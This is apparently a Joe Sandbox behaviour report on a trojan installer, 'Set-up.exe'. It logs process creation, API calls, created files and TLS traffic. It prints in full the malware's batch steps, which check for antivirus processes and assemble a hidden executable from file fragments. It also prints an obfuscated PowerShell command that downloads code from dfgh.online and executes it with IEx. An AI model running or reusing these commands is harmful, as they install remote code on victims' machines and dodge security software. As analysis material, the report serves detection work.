Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: C:\Users\user\Desktop\'Set-up.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DBF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

12_2_00DBF7C7

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DBF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

12_2_00DBF55C

Source: C:\Users\user\Desktop\'Set-up.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DD9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

12_2_00DD9FD2

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DB4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

12_2_00DB4763

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DA1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

12_2_00DA1B4D

Source: C:\Users\user\Desktop\'Set-up.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		0_2_00403883
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DAF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		12_2_00DAF20D

Source: C:\Users\user\Desktop\'Set-up.exe	File created: C:\Windows\BbLodging	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	File created: C:\Windows\ClinicalBanners	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	File created: C:\Windows\ConsumerModule	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	File created: C:\Windows\SlotTheater	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	File created: C:\Windows\AttemptedSunset	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	File created: C:\Windows\SoupCho	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	File created: C:\Windows\MistressBowl	Jump to behavior

Source: C:\Users\user\Desktop\'Set-up.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\'Set-up.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\'Set-up.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D68017	12_2_00D68017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D4E1F0	12_2_00D4E1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D5E144	12_2_00D5E144
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D622A2	12_2_00D622A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D422AD	12_2_00D422AD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D7A26E	12_2_00D7A26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D5C624	12_2_00D5C624
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DCC8A4	12_2_00DCC8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D7E87F	12_2_00D7E87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D76ADE	12_2_00D76ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DB2A05	12_2_00DB2A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DA8BFF	12_2_00DA8BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D5CD7A	12_2_00D5CD7A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D6CE10	12_2_00D6CE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D77159	12_2_00D77159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D49240	12_2_00D49240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DD5311	12_2_00DD5311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D496E0	12_2_00D496E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D61704	12_2_00D61704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D61A76	12_2_00D61A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D67B8B	12_2_00D67B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D49B60	12_2_00D49B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D67DBA	12_2_00D67DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D61D20	12_2_00D61D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00D61FE7	12_2_00D61FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\'Set-up.exe	Code function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: String function: 00D5FD52 appears 40 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: String function: 00D60DA0 appears 46 times

Source: 'Set-up.exe

Static PE information: invalid certificate

Source: 'Set-up.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@29/26@5/2

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DB41FA GetLastError,FormatMessageW,

12_2_00DB41FA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DA2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		12_2_00DA2010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Code function: 12_2_00DA1A0B AdjustTokenPrivileges,CloseHandle,		12_2_00DA1A0B

Source: C:\Users\user\Desktop\'Set-up.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

12_2_00DADD87

Source: C:\Users\user\Desktop\'Set-up.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com

Code function: 12_2_00DB3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

12_2_00DB3A0E

Source: C:\Users\user\Desktop\'Set-up.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Premium

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03

Source: C:\Users\user\Desktop\'Set-up.exe

File created: C:\Users\user\AppData\Local\Temp\nsh768D.tmp

Jump to behavior

Source: 'Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\'Set-up.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\'Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Fires.com, 0000000C.00000003.2135362108.0000000004895000.00000004.00000800.00020000.00000000.sdmp, Fires.com, 0000000C.00000003.2135462785.0000000004866000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\'Set-up.exe

File read: C:\Users\user\Desktop\'Set-up.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\'Set-up.exe "C:\Users\user\Desktop\'Set-up.exe"
Source: C:\Users\user\Desktop\'Set-up.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Breasts Breasts.cmd & Breasts.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 221480
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Premium
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SIGNIFICANT" Collective
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 221480\Fires.com + Sk + Sb + Entire + Descriptions + Thats + Educators + Believe + Childrens + Pioneer + Retrieved 221480\Fires.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Poster + ..\Debate + ..\Scheduling + ..\Fascinating + ..\Groove + ..\Stories + ..\Mailman F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com Fires.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\'Set-up.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Breasts Breasts.cmd & Breasts.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 221480	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Premium	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SIGNIFICANT" Collective	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 221480\Fires.com + Sk + Sb + Entire + Descriptions + Thats + Educators + Believe + Childrens + Pioneer + Retrieved 221480\Fires.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Poster + ..\Debate + ..\Scheduling + ..\Fascinating + ..\Groove + ..\Stories + ..\Mailman F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com Fires.com F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;	Jump to behavior

Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\'Set-up.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\221480\Fires.com	Section loaded: ntasn1.dll	Jump to behavior
